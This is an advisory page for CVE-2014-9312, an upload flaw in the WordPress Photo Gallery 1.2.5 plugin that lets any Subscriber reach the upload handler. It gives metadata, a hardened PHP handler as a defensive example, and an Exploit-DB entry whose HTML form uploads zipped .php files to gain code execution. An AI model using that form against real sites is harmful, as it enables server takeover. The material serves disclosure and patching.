Vendor: Photo Gallery
By: Kacper Szurek
CVSS: 8.8 (HIGH)
CWE: 434 (Unrestricted File Upload)
Product Name: Photo Gallery
Affected Version From: 1.2.5
Affected Version To: 1.2.5
Patch Exists: YES
CVE: CVE-2014-9312
CPE: a:wordpress:photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2014

Photo Gallery 1.2.5 Unrestricted File Upload

Every registered user (even a Subscriber) can reach the upload functionality, because the access check inside UploadHandler.php only requires the "read" role/capability, which every registered WordPress user holds. The proof of concept packs .php files into a .zip archive and submits it through an HTML form to the plugin's admin-ajax upload action; the archive is unpacked server-side and the files become reachable inside the directory named in the request.

Mitigation:

Update to version 1.2.6
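The flaw class described above, as an added illustration that is not the plugin's own code: a hypothetical admin-ajax upload handler gated only on the `read` capability, beside a hardened version that requires an upload capability, a nonce, a confined target directory and an image-only type check. The function names, the nonce action `bwg_upload_nonce`, and the `photo-gallery/` subdirectory under the uploads folder are assumptions.

```php
<?php
// Hypothetical reconstruction of the weak pattern (NOT the plugin's UploadHandler.php):
// 'read' is held by every registered user, Subscribers included, so this gate admits anyone.
function weak_upload_handler() {
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // ... upload and archive extraction into wp-admin/<user-supplied dir>/ would follow ...
}

// Hardened handler for the same admin-ajax action.
function hardened_upload_handler() {
    // 1. Require a capability that only trusted roles (Author and above) hold, not 'read'.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF protection: the form must carry a nonce issued for this action (assumed name).
    check_ajax_referer( 'bwg_upload_nonce', 'nonce' );

    // 3. Confine the destination to a fixed directory under wp-content/uploads,
    //    never wp-admin/<user-supplied>; sanitize_file_name() strips '/', '\' and '..'.
    $upload     = wp_upload_dir();
    $base       = trailingslashit( $upload['basedir'] ) . 'photo-gallery/';
    $sub        = sanitize_file_name( wp_unslash( $_GET['dir'] ?? '' ) );
    $target_dir = $base . ( $sub !== '' ? $sub . '/' : '' );
    wp_mkdir_p( $target_dir );

    // 4. Accept only image types, verified by content and extension; never archives
    //    that get unpacked server-side.
    if ( empty( $_FILES['files']['tmp_name'] ) ) {
        wp_send_json_error( 'no file', 400 );
    }
    $name = sanitize_file_name( $_FILES['files']['name'] );
    $type = wp_check_filetype_and_ext( $_FILES['files']['tmp_name'], $name, array(
        'jpg|jpeg|jpe' => 'image/jpeg',
        'png'          => 'image/png',
        'gif'          => 'image/gif',
    ) );
    if ( empty( $type['ext'] ) || empty( $type['type'] ) ) {
        wp_send_json_error( 'invalid file type', 400 );
    }
    $final = $type['proper_filename'] ? $type['proper_filename'] : $name;
    $dest  = $target_dir . wp_unique_filename( $target_dir, $final );
    if ( ! move_uploaded_file( $_FILES['files']['tmp_name'], $dest ) ) {
        wp_send_json_error( 'upload failed', 500 );
    }
    wp_send_json_success( array( 'file' => basename( $dest ) ) );
}
add_action( 'wp_ajax_bwg_UploadHandler', 'hardened_upload_handler' );
```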

Exploit-DB raw data:

# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps

1. Description
  
Every registered user (even a Subscriber) can access the upload functionality because of the read role used inside UploadHandler.php.

http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
  
2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register).

Pack the .php files into a .zip archive, then send it using:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>

Your files will be visible inside:

http://wordpress-install/wp-admin/rce/
  
3. Solution:
  
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip